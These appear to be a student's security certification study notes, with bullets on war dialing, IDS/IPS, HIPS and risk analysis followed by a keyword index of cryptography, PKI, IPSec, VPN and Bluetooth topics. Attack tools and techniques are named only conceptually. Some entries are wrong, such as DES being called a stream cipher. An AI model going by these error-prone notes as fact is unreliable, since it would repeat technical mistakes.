free,can skip numbers, war dialing tool
heat ventialation air conditioning may use active phone system,skip them when running war dialer
monitor call logs,use honeypot,scan and take action
in war dailing will allow you to scan more numbers in shorter time
used to determine the validity of identified vuln
war dailing,war driving,sniffing,eavesdropping,dumpster diving,social engineering

a subsequent pen test can vertify where these false positives can be ignored

alarm system,needs incident handler,not low maintaince tool
true positive, false positive ….
an event of interest ,can be anything the analyst want to identify with ids
true hacking
ids generate alaram for false hacking,burden on admin
true ok ,ids doesn't generate alaram for this
false ok this is bad,doesn't generate alarm for the analyst,worst case
passive sensor,uses signaturs,anomaly,application protocol analysis
checksum of file,string search,protcol,address,port,payload contents,flags,traffic flow analysis
no operation,used in bufferoverflow attacks,0x90 value
inclusive detection medthod,for sepcific protocols or applications
exclusive method,standered definations,implementation nuances,changes to protocol
header only,very fast
header and data,slow,anomaly analysis,protocol analysis
use comination of deep and shallow inspection
attackers change data charecteristics to pass the ids,de-normalize traffic
ids take the data to baseline before analysis
audit for other controls ,….
labeling information with unique keywords,project id
topology,encrypted traffic,quantity,quality,performance,very costy
spanning ports,taps,affect switch performance
solution for the spanning port ,work also on fiber,no imapct on performance,need tap for each wire
Use anomaly analysis -increase false negative-

bandwidth, decryption , llts of small packets decrease performance
a mangeable subset of traffic is desirable alternative to complete failure when there's too much traffic




open-source ,designed to retrive data from the Kernal and pass it to the Application Layer (TCPDump Linux )
packet capture for windows (or for Program running on windows is called WinDump)
Shadown,Snort,Cisco IDS and NFR
cisco ids




list the available rpc ports on a remote host
32-bit words-always carry a lot of zeros
snort user community develop new rules to detect the latest exploit,virus and worm or other attack technique
basic (pass- log-alert),advanced (activate-dynamic)




a security information event management station,combine multiple sources into one machine
a security information event management station,combine multiple sources into one machine
atechnique to monitor network traffic and identify the hosts operating systems
like vulnerability scanners used by nids
new method to identify vulnerable services,characteristics of applications

Modul inserted into the switch cusrom hardware
wireless ids,detect rogue access points
calculate hash,then comapre
alist of keywords or phrases that define event of interest,don't match --- > alert
alist of keywords or phrases that define event of interest,match ---> alert
inclusive or exclusive
notable encryption , identifies inside attacks agains system, details inside the network not perimeter only
………
can be used to identify attacks & identify policy viloations
monitor application level, protect web sites, Appliance plateform support(routers, switches), morphing with
HIPS integrity check as a HIDS, & can react to changes to monitored files by restoring backup as a HIPS.
is a file
is a powerfull tool for detecting rising internet threats (isc.sans.org )

will try to stop attack before they are succesful, but it prevent passively unlike Firewall.
IDS is deployed PASSIVELY, while an IPS is traditionally deployed INLINE
by: sending REST & modify firewall rules.
……….
it's a real internet prevention system but it's static.
stop known &unkonwn attacks,system call interception,monitior traffic on network, file integrity & app
behavior use combination of signature analysis and anomaly analysis to identify attacks
hips tools
hips software inserts its own process between application and os resources
the ability to STOP attacks from being successful, +all the adv of HIDS
False positive, implement& maintenance, limit App support, more sys resources, limited nodes for Mang console
additional burden of hips,need more processing & possible reduce of ur workstation lifecycle
max about 3000 node per one console
manufacture select supported App and record the intended functionality of the App in normal use
manufacture select supported App and record the intended functionality of the App in normal use
Document procedures, develop mang policy, don't blindly install s/w updates, don't rely solely on hips.
zeroday vuln protection, application shielding behavior,
locks an application into a sandbox where it is not permitted to communicate with othe applications
zero day protection build into hips

before the firewall or behind firewall, it depends.
inline cause single point of failure for network,use custom ASICS to support high-speed analysis with complex
inspection, uses data normalization & assembly techniques on aggregation traffic, hierarchical rule classification
scheme used to classify and identify traffic
zero power high availability for nips ,will re-route network traffic when IPS device lose power
traffic analyzed should be in the milli-second range
must be against compormise, configurng nips without ip or mac on data interface
at nips, simple tests applied to traffic, then more tests to it, this enhance system performnce
at nips, simple tests applied to traffic, then more tests to it, this enhance system performnce
packet header info, transport layer session info, App layer sesion info, payload string matching, App layer
analysis, complex regular expression matching
false positives drops legitmate traffic,more false negative than ids, Latency, hasn't extensive rule-base for
identifying attacks on the network, unlike NIDS.
to reduce false positives by identify host OS, network architecture, vulnerabilities on network.
improved throughput & response time, automatic anaysis/signature updates, environmental anomaly analysis,
protocol scrubbing, limiting stream to apply QOS, enfore organisation policy by drop traffic of unauthorized Apps
tipping point Nips product can handle >2gb throuput with latency less than one millisecond.
can be used to clean garbage from the traffic stream,send rst to connections to tier them down
to apply qos mechanisms to network traffic
by drop traffic from unauthorized Applications like peer-to-peer applications
ids+something, use system call interception,was Entercept product

nips, G-series provide high speed deep inspection, M series provide unified threat management
throughput: from 100mb to 2gb, Modes: passive monitoring, inline simulation, inline protection
G series, like IDS, block malcious traffic by sending tcp rst to offending connection
monitor only mode, it provides monitoring on life to tune your policies before live implementation
full on Nips,all malcious traffic blocked
a division @ ibm iss, responsible for staying on top of security research and vulnerability detection.

firewall plus something
help against worms,trojans,integrated into vpn-1
internal security gateway that builds SmartDefense technology
Antivirus plus something, ips, can report to centralized management console
an Extra Widget, can limit traffic to apply QOS, block applications like peer-to-peer
Notify, Report, Limit, Block
patent tech for tipping point, use parallel field programmable gate array(FPGA), Asic H/W to perform deep
packet inspection

the art of analyzing threats and vulnerabilities and determining the impact on enterprise
to reduce the risk until it is in acceptable level
determine the risk,analyze the impact of risk,determine action to handle these risks
identify,measure,control and minimize liklihood of attack
is to concentrate on protecting areas if comprimized could incur most damage
the x-axis is severity of consequences,y-axis is propability of liklihood
set security infrastructure,design controls for each tech,……..
policies,procedures,end-user security awareness program
technology-based solution example(Firewall,IPS,anti-virus ,etc..)
focus on the process not just series of actions
information security risk is one form of multiple risks
is a weakness in the system can be xploited or weakness that could lead to system compromise
any event can cause undesirable outcome or someone exploit this weakness and compromis that system
equal vulnerability * threat
u have to link the vulnerability and threat before talking about risk
to decide between accepting, mitigation or transfering the risk, they are: what could happen? how bad? how
often happen? how reliable(degree of uncertainty)?
risk require uncertainty with probability from 0 to 1, people always express it as a percent
for technicals it's easier. According to the standard or best practise, u could avoid risk after depolying a standard
like ISO standard .
the loss from single event, if u had been exploited what it would cost u
annual expected loss based on a threat, SLE * Multi-hits of exploit
Asset value * Exposure factor, if conference room=$100,000 and terrorist attack cause 50% loss --> SLE= $50,000
the percentage of loss a threat event would have on asset, in terms of 0--> 100 % loss to an asset
ALE - Multi-Hits, Ale=SLE * annualized rate ocuurance
is the estimated frequency at which a threat is expected to occur, could be easy to calculate or very complex
far more valuable as a business decision tool,work with metrics, Dollars, Monetary loss value.
easier,identify high risk areas, [low, medium , high] risk categorization

if u can't proof that systems @ risk.. It\ll be harder to get fund for ur recommendations. U can use some existing
resources of data like F/W or log system to proof to them, show them a "smoking gun".
identify type of threat,look for evidence, two outsider attacks, two insider attacks,malcious code
outsider attacks from (Network & telephone), insider attacks(local network & local system), malcious code
1-Identify existing countermeasures, threats and vulnerbailities. 2- support expenditure(price) of resources and
cost effective safeguards. 3- Aid in selection of cost-effective countermeasure to reduce risk to acceptable level
provide the best way to focus on the real threat by focusing on the threat vectors in the matrix.
use newspaper, hacking web sites, firewall & ips logs, scan netework with SNMP to look for other routes &
backdoors, try to connect ur wireless from parking lot
use HIPS, windowes event log, tcpwrappers, honeypots, unix Xinetd, TCPwappers.
Virus scanning, HIDS(Tripwire unix & windows ),Egress filtering catch worms
excellent way to detect systems infected with malicious code because they often use spoofed IP address
risk management step2,understand the quantitve analysis of your assets
asset identification and valuation
vulnerability analysis,
risk management step3,new discovered and old
risk management step 4,calculate ale
risk evaluation
risk management step5,project summary,asset identification,plan to recommendations
interim report
comaprison between he cost of implementing counter measures with the value of reduced risk
intial cost+labor cost+life cycle cost
interim report+safeguard selection+risk mitigation analysis+cost benefit analysis+recommendation
short amount of time for little or no cost
involve redesign of infrastructure and increaed safeguard solution cost
              module 13


e password)
module 14
module 15
module 16
module 17
KeyWord                                     Book   Page   Comment
Cryptography                                 4      6     means hidden writing
Encryption                                   4      6     coding a message in such a way that meanings is concealed
Decryption                                   4      6     is the process transforming encrypted message back into its original plaintext or cleartext.
Ciphertext                                   4      6     is a message in its encrypted form.
Cryptographer                                4      6     who created encryption algorithm
Cryptanalysts                                4      6     who deicate their live to breaking ciphers
Cryptology                                   4      6     generic form of the study of both cryptography and cryptanalysis
David Kahn                                   4      7
Julius Caersar                               4      7
Bruce Schneier                               4      7
Security by Obscurity is no Security         4      8     proprietary alogorisms are high-risk, because it's not available for public scientists to check the cipher
CSS - (Contents Scrambling System )          4      8     encrypt data on dvd
Tamper - proof                               4      8
DeCSS                                        4      9     Decrypt data on dvd

Beware of Overconfidence                     4      10    even if someone know how the algorithm work, without the key he should still unable to decipher the message, u must protect ur key

Goals of Cryptography                        4      12    CIA, Non-repudation
Confientiality                               4      12
Authentication                               4      12    validating the authenticity of the person with which u r communicating.
Integrity                                    4      12    prove the message has not been tampered
Non-Repudiation                              4      12    able to prove in a court of law that someone has sent the message.
ENC - (Digital Substitution) [encryption]    4      14    it's a digital substitution NOT encryption
Digital Substitution [encryption]            4      14
XOR function                                 4      14
Digital Substitution [Decryption]            4      16
OR function                                  4      16
Symmetric Encryption basic techniques        4      17    Basic techniques: Substitution, Permutation, Hybrid
Encoding                                     4     none   the difference between encoding & encryption that the key in encoding is well-known but in encryption is secret.
Arbitrary Substituation                      4      18    use one-to-one substitution of characters.
Rotation Substitution                        4      19    use one-to-one substitution of characters, Rotate the alphabet by X characters.
Cesar Cipher                                 4      19
ROT-13                                       4      19
Permutation                                  4      21    also called Transposition, change the character from its position not the char itself.
Transposition                                4      21    also called Permutation, change the character from its position not the char itself.
Block Ciphers                                4      22    encrypt one block of data at time
BLOCK cipher - modes                         4      22    there are four modes and the mode will affect on the strength and performance of cryotosystem: ECB, CBC, CFB, OFB
ECB - (Electronic Codebook mode)             4      22    Two identical plaintext block will generate the same cipher block, it's susceptible to brute-force attack

CBC - (Cipher Block Chaining mode)           4      22    plaintext is XOR with the previous ciphertext block, in this mode Two identical blocks of plaintext never encrypt to the same ciphertet

CFB - (Cipher feedback mode)                 4      22    it is stream cipher used for encrypted interactive terminal
OFB - (Output feedback mode)                 4      22    like CBC but prevents the same plain text from generating the same ciphertext by using internal feedback mechanism.
DES - Data Encryption System                 4      22    it's a very common stream cipher, it uses 64-bit block and 56-bit key.
                                                          operates on a single bit, highly dependent on the randomness of the keystream, keystream length must = plaintext length, and have a vulnerability
Stream Ciphers                                4    24
                                                          to Noise during transmission.
Keystream of stream cipher                    4    24     keystream length must = plaintext length, generated at both sending and receiving ends.
autokey of stream cipher                      4    24
self-synchronizing stream cipher (auto-key)   4    24
synchronizing stream cipher                   4    24     unpredictable to eavesdropper
cryptosystems types                           4    26     3 general types: Secret Key(symmetric), Public Key (asymmetric), Hash (one-way transformation)
Symmetric Key Cryptosystem                    4    27     secret key encryption , Example, DES,3DES,AES,Blowfish,RC4,IDEA
Symmetric Key Cryptosystem                    4    27     fast, require secure channel for key distribution, no technical non-repudation

Asymmetric Key Cryptosystem                   4    28     aka "Public - key", Slow, public key widely distributed within digital signature, technical non-repudiation via digital signature

                                                          it's a mathematical functions which are easy to calculate and very difficult to inverse calculation like: (Multiplication & factorization) and
trapdoor function & example                   4    28
                                                          (Exponential & Logarithms), used in Diffie Hellman
Public key                                    4    29
Private key                                   4    29     If I encrypted the message with my private the others could decrpted the message with my public key
Public-key crypto - Who invented it ?         4    29
Diffie-Hellman Key Exchange                   4    30     Diffie-Hellman is used only for key exchange.
Hash Function                                 4    32     one way algorithm, the key length is the Hash length, like: MD2, MD4, MD5, RIPEMD-160, SHA-1, SHA-2
Hash Algorithm                                4    32     are effective due to the extremely low probability that two different plaintext have the same hash value
Message digest                                4    32
MD2 - Message digest 2                        4    32     128-bit hash
MD4 - Message digest 4                        4    32     designed for fast processing in software, also 128-bit hash
MD5 - Message digest 5                        4    32     slower that MD4, but work on weaknesses reported on MD4, 128-bit hash
SHA - Secure hash algorithm                   4    32     Secure Hash Standard (SHS), 160-bit value
Steganography                                 4    34     hiding the data in carrier file ( medium jpg,.doc,.wav,etc…)
Steganography - carrier or host file          4    34     used to hold the hidden data ,word ,bmp,jpeg,wav,movies,HTML files
Covered writing                               4    34
Crypto vs. Stego                              4    35     crypto provides confidentiality but NOT a secrecy

Steganography Doesnot guarantee Safty         4    35     secrecy provides by stego is great but data protection is still relies on encryption algorithm used, always try to encrypt data before using stego

Cryptography - Detection                      4    36

Histogram                                     4    37     it's a Graph that represents the number of occurrence of data in a given distribution of data (frequency of characters varies great)

Steganography components                      4    38     Host file(is thw medium used to hold the hidden data) and the carrier (image, word doc, movie, sound,...)
Stego types                                   4    39     1- Injection, 2- Sunstitution, 3- generate new file

Stego-injection                               4    40     we place the information into "holes.", he meant,unused ares of the file, the biggest problem of injection type is that the size of the carrier increases.

snow + options (injection Stego)              4   40-41   is command line program and tools for injection
                                                          most popular method used and file size of the carrier remains the SAME by replacing useless data in the host file. Like: Least Significant bits (LSB) in
Stego-substitution                            4    42
                                                          the color table of a graphic
Stego-generate a new file                     4    43     hidden data used to generate a New File, No fle host is needed
cryptosystem                                  4    50     main golas: confidentiality,integrity of data , authentication , and non-repudiation . There NO availability
                                                          allow message to be decrypted using different key than one used to encrypt the message. If the mgs encrypted by public key, then the trapdoor is
trapdoor function & example                   4    50
                                                          the private key
one - way function                            4    50     reveal the time and space required to execute intractable problems
Algorithm comutational complexity             4    51
comutational complexity                                             4    51     of a crypto algorithm

Big-O notation                                                      4    51     used to give a general idea of how many operations a problem takes to relative the input size n, used as indication of a problem's complexity

quadratic time                                                      4    51     O(n^2)
cubic time                                                          4    51     O(n^3)
constant time                                                       4    51     O(1)
linear time                                                         4    51     O(n)
                                                                                easy problems that could be solved in a polynomial time, the relation between the input size and number of operations required to solve the
Tractable problem example                                           4    51
                                                                                problem is contant, linear, quadratic or cubic
                                                                                Very hard problems that can't be solved in a polynomial time(Asymmetric encryption), like exponential O(2^n), superpolynomial, cubic-time
Intractable problem example                                         4   51-52
                                                                                algorithm, exponential-time algorithm
exponential O(2^n)                                                  4    51     an example of intractable problems.
superpolynomial                                                     4    51     an example of intractable problems, something between polynomial and exponential, more complex & hard.
cubic-time algorithm                                                4    51     an example of intractable problems. And could take thousands of years to be solved.
exponential-time algorithm                                          4    51     an example of intractable problems. Could take longer than the universe to be solved.
Intractable - factoring integer problem                             4    53     Difficulty of factoring a large interger into its two prime factors, hard problem solved by trial & error, used by RSA
factoring integer problem - Intractable problem                     4    53     Difficulty of factoring a large interger into its two prime factors, hard problem solved by trial & error, used by RSA
                                                                                a^x mod n = b , mod(means remainder), very difficult to be solved, used by: EL-Gamal, Diffie-Hellman, Schnorr signature scheme, digital Signature
Intractable - discrete algorithm problem                            4    54
                                                                                Algorithm
                                                                                a^x mod n = b , mod(means remainder), very difficult to be solved, used by: EL-Gamal, Diffie-Hellman, Schnorr signature scheme, digital Signature
discrete algorithm problem - Intractable problem                    4    54
                                                                                Algorithm (DSA)
Schnorr signature scheme                                            4    54     an algorithm that uses the intractable problem of discrete algorithm for finite fields
DSA - digital Signature Algorithm (DSA)                             4    54     an algorithm that uses the intractable problem of discrete algorithm for finite fields

                                                                                hard problem, use Elliptic Curve Cryptosystems (EEC) which offer [Higher speed, lower power, tighter code], used by: Elliptic Curve EL-Gamal, Elliptic
Intractable - discrete lgorithm problem applied to elliptic curve   4    55
                                                                                Curve Diffie-Hellman, Elliptic Curve Schnorr signature scheme, Elliptic Curve digital Signature Algorithm (ECDSA)

Elliptic Curve EL-Gamal                                             4    55     use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)
Elliptic Curve Diffie-Hellman                                       4    55     use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)
Elliptic Curve Schnorr signature scheme                             4    55     use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)
ECDSA - Elliptic Curve digital Signature Algorithm                  4    55     use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)

EEC - Elliptic Curve Cryptosystems                                  4    55     provides Higher speed, lower power consumption, and tighter code

DES - Data Encryption Standard                                      4    57     2^56 key size, 64-bit (8-bit for parity & 56 key) block cipher. Fast, uses (16 rounds)
                                                                                it has 4 operations mode like any block cipher: ECB - (Electronic Codebook mode), CBC - (Cipher Block Chaining mode), CFB - (Cipher feedback mode),
DES - four operation modes                                          4    57
                                                                                OFB - (Output feedback mode)
DES weakness                                                        4    58     not secure due to its key size, and not because the algorithm has been broken
DES is not group                                                    4    59     this means that multiple DES ecryption are not equivalent to single encryption. THIS ID GOOD THING
                                                                                DES algorithm is not group, this means that multiple DES ecryption are not equivalent to single encryption, so Multiple encryption will increase the
DES advantage                                                       4    59
                                                                                security.
algorithm is group                                                  4    59     means that encryption multiple times is waste of time
DES-Meet In the Middle attack                                       4    60     only twice the work of brute-forcing DES . Attacker has the cleartext and ciphertext
Double DES                                                          4    60     doesn't increase the effective key size significantly, 2^57 key size
Triple DES                                                          4    61     last release, can be configured to use either 2 or 3 unique keys, 112-bit (2keys), 168 (3 keys)
Triple DES                                                          4    61     execute 48 rounds (3 * 16 round)
AES - Advanced Encryption Standard                                  4    62     has three key size: 128-bit , 192-bit , and 256-bit
AES - evaluation criteria                                           4    62     security, cost, and algorithm and implementaion characteristics
AES algorithm details                         4    64     the algorithm details with Functions.
AES basic functions                           4    65     AddRoundKey(), SubBytes(), ShiftRows(), MixColumns()
S-box substitution                            4    65
AES development                               4    66
                                                          most common Asymmetric key Encryption, it can be used to support both encryption and digital signature, it's a central part of Secure Socket layer
RSA                                           4    67
                                                          (SSL)
RSA vulnerability                             4    67     RSA Vulnerabilities come from: 1- Poor RSA implementation, 2- ising small key length
RSA                                           4    67     the security of cryptosystems comes from the secrecy and size of the private key
RSA vs. DES                                   4    68     DES is 100 times faster than RSA.
                                                          it can be used to support both encryption/decryption and digital signature, high security even with small key length (higher strength per bit), high
ECC - Elliptic Curve Cryptosystem             4    69
                                                          speed implementation, low process power
ECDLP - ECC intractable problem & sol         4    70     Y^3=X^2+aX+b, Pollard rho-method is the best-known solution for ECDLP
Pollard rho-method                            4    70     is the best-known solution for ECDLP are fully-exponential.
Key Length Comparison                         4    71     compare keys of: 3DES, AES, Diffie-Hellman, RSA, ECC key length.

Known Plaintext attacks                       4    73     cryptanalyst knows: 1 plaintext + 1 ciphertext, wants to know: key or another algorithm to decrypt any msg with a key the cryptanalyst knows

Chosen Plaintext attacks                      4    73     cryptanalyst knows: 1 chosen plaintext + 1 ciphertext,
Adaptive chosen Plaintext attacks             4    73     special case of the chosen-plaintext attack, cryptanalyst knows: many chosen plaintext + many ciphertext
                                                          by: 1- Keeping plain test secret or delete in if not needed, 2- prevent mechanisms that allow the attacker to encrypt random msgs using ur secret
crypto attacks- how can be guarded            4    74
                                                          key.
Ciphertext only attacks                       4    74     cryptanalyst knows: ciphertext only , no plaintext, the goal: recover one plaintext or key
chosen ciphertext attack                      4    74     cryptanalyst knows: ciphertext + plaintext, this attack is mainly used against asymetric key ( public-key ) cipher
chosen key attack                             4    74     cryptanalyst knows: specific relationship betwwen the keys only
Birthday attack(Birthday paradox)             4    75     used with hash attacks
cryptography Applying the to network          4    80
clear text protocol                           4    81     telnet,rlogin,rsh,rexec
encryption Applying to application layer      4    81     APOP , AFS ,Secure shell,APOP protect authenication message no the E-mail message it-self

encryption Applying to transport layer(TLS)   4    81     TLS protocol is to provide privacy and data integrity between two applications,it's comproise of two protocol recored and handcheck

TLS - Record Protocol                         4    81     which is used to securely transfer application data
TLS - Handshake protocol                      4    81     which is used to negotiate the details of secure session
encryption Applying to network layer          4    82     VPN
Confientiality in Transit                     4    84
Private circuit (network)                     4    84     pro:dedicated lines, Cons:expensive
VPN - Virtual private network                 4    85
VPN - advantage                               4   86-87   Flexibilty, Lower cost than leased lines.
VPN - disadvantage                            4    88     IPS cannot examine the information in message(because of encryption),therefore QoS for VPN is more difficult
                                                          Helps to provide QOS over tranditional ip service, QoS require to look into the message to decide which message has high priority but this cann't
VPN - MPLS(multiprotocol lable switching)     4    88
                                                          because encryption(mpls/vpn)
VPN - Remote access type                      4    89     client to site , site to site , client to client
VPN =>Client - to - site (transport)          4    89
VPN => Site - to - Site (tunnel)              4    89
VPN => Client to client                       4    89     not used more
VPN - security problems                       4    90
IPSec                                          4    92      RFC 2401, scale from small to v. large networks, commonly implemented.
                                                            is to copy the msg from the network, & retransmit it even if the attaker can't undersatnd it, this would cause undesired results, ex: retransmitting a
IPSec - Replay attack                          4    92
                                                            request packet to transfer $1000
IPSEC - Headers                                4    92      Authenticaton Header (AH), Encapsulated Security Payload (ESP)
IPSec - authentication header (AH)             4   93-94    Integrity, No confidentiality, anti-reply, origin authentication
IPSec- AH => ICV(integrity check value)        4    93      to prevent spoofing IP address and to verify Integrity there is not anyone tampered with info.
IPSec - encapsulation security payload (ESP)   4   94-95    Integrity (not perfect integrity), confidentiality, anti-reply, origin authentication
IPSec - Null algorithm                         4    95      it does nothing to the msg, used if u want to turn-off encryption on IPSEC
Null Alogorithm                                4    95      it does nothing to the msg, used if u want to turn-off encryption on IPSEC
IPSec - mode types                             4    96      tunnel mode, transperent mode
IPSec - Tunnel mode & AH                       4    96      authentication, integrity
IPSec - Tunnel mode & ESP                      4    97      encryption, authentication.
IPSec - session establishment                       97      the two sides of connection must agree on what options they are going to use, Session Assosiation
                                                            critical part of IPSEC, they document the security services (transformers) that is used by specific IPSEC connection, & must be agreed by both sides of
IPSec - Security Associations                  4    97
                                                            the IPSEC
                                                            ISAKMP(internet security association and key management protocol, protocol used by IPSEC to negotiate the session details of a connection and then
IPSec - internet key exchange IKE              4    97
                                                            document them as Sas.
IKE internet key exchange                      4    97      protocol used by IPSEC to negotiate the session details of a connection and then document them as Sas.
IPSec => IKE =>ISAKMP                          4    97      key management
ISAKMP                                         4    97      key management
IPSec => IKE => Oakley                         4    97      key exchange
Oakely                                         4    97      key exchange
IPSec => IKE => SKEME                          4    97      secure key exchange mecchanism, extend the capabilites of Oakely.
SKEME                                          4    97      secure key exchange mecchanism, extend the capabilites of Oakely.
IPSec=>phase one => main mode                  4    98      check the identity of the participant
IPSec=>phase one => aggressive mode            4    98      does not check the identity of the participant
IPSec=>phase two => quick mode                 4    98
SSL VPN                                        4    99      should open firewall ports 80 & 443
SSL portal VPNs (Client - Site)                4    99      Client - Site, accessible to more user than SSL tunnel VPNs( site - Site)

SSL tunnel VPNs                                4   99-100   quit different of IPSEC tunnels, in that SSl tunnels always created by non-standard tunneling methods while IPSEC used standard methods

VPN - GRE                                      4    101     to securly bridge any non-ip networks (IPX, Appletalk) over an IP network
VPN - L2TP                                     4    102     to securly bridge dial-in users.
VPN - PPTP                                     4    101
VPN - L2F                                      4    101
IPSec - NAT                                    4    102     NAT is incompatible with IPSec AH ,but NAT can be used with IPSec ESP in two modes tunnel and transport
PGP - history                                  4    104
PGP - protects emails                          4    104     PGP provides confedentiality through encryption, integrity & source identification through digital signatures.
PGP -encryption                                4    105
PGP - On the fly encryption                    4    106     hard disk encryption, files are encrypted on the disk, and decrypted to be read.
                                                            can be used to digitaly signed a message, uses SHA-1 (1024, 2048 min key) to generate the digest, & uses it's private key to encrypt it, and the reciever
PGP- encryption & digital signature            4    107
                                                            would use the sender public key to decrypt the digest and validate it
PGP - Private passphrase                       4    108     most critical part of key generation, password protect ur stored private key
E-mail - encrypting                            4    109
E-mail - decrypting                            4    111
E-mail - signing                                          4   112
E-mail - sign confirming                                  4   113

PKI                                                       4   115   allow users to exchange encrypted information over public network, hierarchy infrastructure system used to create digital certificates.

PKI - Verisign                                            4   115   a certification authority
Verisign                                                  4   115   a certification authority
CAC - Common access card                                  4   115
CAs - Certificate authorities                             4   117   create certification based on the user's identity information
CPS - Certificate practice statement                      4   117
PKI servers types                                         4   118   Root CA, Intermediate CA, Issuing CA
Internal PKI                                              4   118   some companies uses PKI as basis for NAC solutions.
External PKI                                              4   118
Certificate authorities trust models                      4   119   hierarchical, Bridge, Mesh, Hyprid
Certificate authorities models-hierarchical               4   119
Certificate authorities models-Bridge CA                  4   119
Certificate authorities models-Mesh                       4   119
Certificate authorities models-Hybrid                     4   119
Certification life cycle                                  4   120
PKI - Certification life cycle                            4   120
Certification life cycle - regiteration & intialization   4   120
DN - Distinguish Name                                     4   120   person or entity who wants the certificate providing their identification in the form of DN.
Certification life cycle - key storage                    4   121   by S/W (client browser) or H/W (TPM, CAC "Common Access cards")
Certification life cycle - key ceremony                   4   121   client browser
Software key store                                        4   121   smart card
Hardware key store                                        4   121
TPM - Trusted privacy Module                              4   121
Certification key Escrow                                  4   122   key backup
Certification life cycle - expiration date                4   122
Certificate revocation list                               4   122
key recovery                                              4   122
Digital certificate                                       4   123   X.509 certificate
Certificate policies document                             4   124   the documentation that specifies how certain certificate are to be used, tcp port 443
X.509 extentions                                          4   124   to distinguish between the certificates issued for browser and for server
                                                                    is one use of PKI to encrypt msgs between web server and web browser, done by SSL & TLS, client & server uses PKI certificate (Asymmetric) to
SSL (Secure layer socket)                                 4   125
                                                                    negotiate a session key (symmetric)
TLS(Transport layer security)                             4   127   SSL Steps from client to server
SSL handshake                                             4   128   SSL Steps from client to server
PKI SSL handshake                                         4   128   SSL Steps from client to server
SSL PKI crypto                                            4   128   SSL Steps from client to server
PKI SSL crypto                                            4   128   SSL Steps from client to server
Secure E-mail(S/MIME)                                     4   129   another use of PKI is to encrypt or digital sign e-mail messages, bulit in many mail clients, outlook, blackberries
S/MIME - Secure E-mail                                    4   129   another use of PKI is to encrypt or digital sign e-mail messages, bulit in many mail clients, outlook, blackberries
Disk encryption                                           4   130   another use of PKI is to create certificates to be used for disk encryption
PKI - Disk Encryption                             4   130   another use of PKI is to create certificates to be used for disk encryption
Cold boot attack                                  4   130   dumping the data from the memory and use it to work around disk encryption to be able to read the data
PKI - other uses                                  4   131   NAC, NAP, Code & driver, General Uset Authn., Wireless Authen., IPSEC & VPN Authen., Digital Signature.
PGP - as Web of trust                             4   132   to use it like the PKI
PGP - Trust Depth Level                           4   132   to limit how much of this web you trust.
PGP - Trust establishment                         4   133   trusting a certificate isnot the same as trusting a person.
PGP - certificate's fingerprint                   4   133   used to trust the integrity of this certificate.
certificate's fingerprint                         4   133   used to trust the integrity of this certificate.
Signature & certificate revocation                4   133   at PKI
PKI - Signature & certificate revocation          4   133
biometric words                                   4   133   PGP translates the Hexadecimal digits into twenty Biometric words to be easy to pronounce to be validated
PKI - biometric words                             4   133   PGP translates the Hexadecimal digits into twenty Biometric words to be easy to pronounce to be validated
                                                            incomplete Standards, certification of Cas (directly affect how secure the entire PKI based upon them), Cross-certificae between Cas, user-education
PKI problems                                      4   135
                                                            or perception, lack of critical mass)
Wireless devices                                  4   143   PDA, Mobile phones, Laptops, Pagers, HVAC control units.
Wireless advantage                                4   144
Vertical markets of wireless                      4   146   Healthcare, Financial, Academia, Factories/industrial, Retail, Wireless ISP
ROI(return on investment)                         4   147   huge ROI of wireless on the hospitals (healthcare) industry.
POS(point of sale)                                4   147   retail chains are mitigating toward wireless networks to extend their point-of-sale (POS) solutions.

Bluetooth                                         4   149   is a cable replacement technology, no line-of-sight, support (data,voice, and other applications), can support up tp 7 simultaneous connections.

Bluetooth classes 1, 2, and 3                     4   150   class 2 most commonly found in wireless card , phone, labtop computer
Bluetooth specification                           4   150   Range: 1m,10m,100m, Max BW= 2.1 Mbps, Freq= 2.5 GHz (FHSS) EDR
EDR - enhanced data rate bluetooth spec.          4   150   improve the rates of Bluetooth upto 2.1 Mbps
FHSS - freq hoping spread spectum                 4   150   hop between 79 cifferent channel in 2.4GHz , used @ Bluetooth, provide high degree of interference immunity.
Bluetooth security                                4   151   PIN, encrypt transferred data using a security key generated by using PIN & Bluetooth MAC
PIN - Personal Identifier Number                  4   151   used @ Bluetooth to authenticate devices together, entered manually @ eah device.
BD_ADDR                                           4   151   is the MAC address of the Bluetooth Device.

Bluetooth Security keys                           4   151   when two devices conncts for the first ime, they use the PIN & BD_ADDR to generate permanent link keys that are stored on each device
                                                            the ability to communicate with the machine to insert inputs and command for it. @ BlueTooth. The lack of HMI results in fixed PIN selection for
HMI - human to machine interface                  4   151
                                                            bluetooth devices like handsets ('0000' or '1234').
Bluetooth security issues                         4   152   eavesdropping attacks,
SIG - Bluetooth Special Interset Group            4   151

SAFER+ cipher by Cylink                           4   152   is the bluetooh algorithm that used for encryption and authentication, & is a submission candidates for AES algorithm, 128-bit key

PIN brute force                                   4   152   4-digit PIN could be brute forced at 63 msec, using a Pentium4 3GHZ system
brute force PIN                                   4   152   4-digit PIN could be brute forced at 63 msec, using a Pentium4 3GHZ system
Bule sniff                                        4   152   tool to attack Bluetooth, can locate and circumvent the security of BlueTooth networks.
RedFang                                           4   152   tool to attack Bluetooth, cancircumvent the security of BlueTooth networks.
Bluetooth protocol analyzer                       4   152   can passively capture and record all Bluetooth network activity within range
BNEP - Bluetooth Network Encapsulation Protocol   4   152   protocol used to configure Bluetooth devices to extend access to the wired network over a wireless network, like 802.11
                                                            prevent Bluetooth devices from being discoverable. But devices in this mode should reply resond to the PAGE_request from another Bluetooth
non-discoverable mode                             4   153
                                                            device.
BlueScanner                                       4   154   tool for XP-SP2 allows user to discover nearby Bluetooth networks, and categorize by type and service they offer.
                                                          many of Bluetooth vulnerabilities on Application Layer, allow retrive of phonebook & calender, attacker remotely create a virtual serial
BlueSnarf attack                                4   155
                                                          connection, this allows AT commands to be sent to the phone
Bluetooth sniffing impact                       4   156   attacker could capture the data exchange between Buletooth keyboard,mouse and desktop/labtop system, could inject keystrocks remotely
                                                          1- configure devices in non-discoverable mode, 2-audit Bluetooth environment, 3- use Strong PIN (12-digit), 4- vendors should implement SIG 2.0
Bluetooth protection                            4   157
                                                          Specs/PKI support.
ZigBee - wireless                               4   158   Bsed on 802.15.4 Specs, low cost, cable-replacement tech
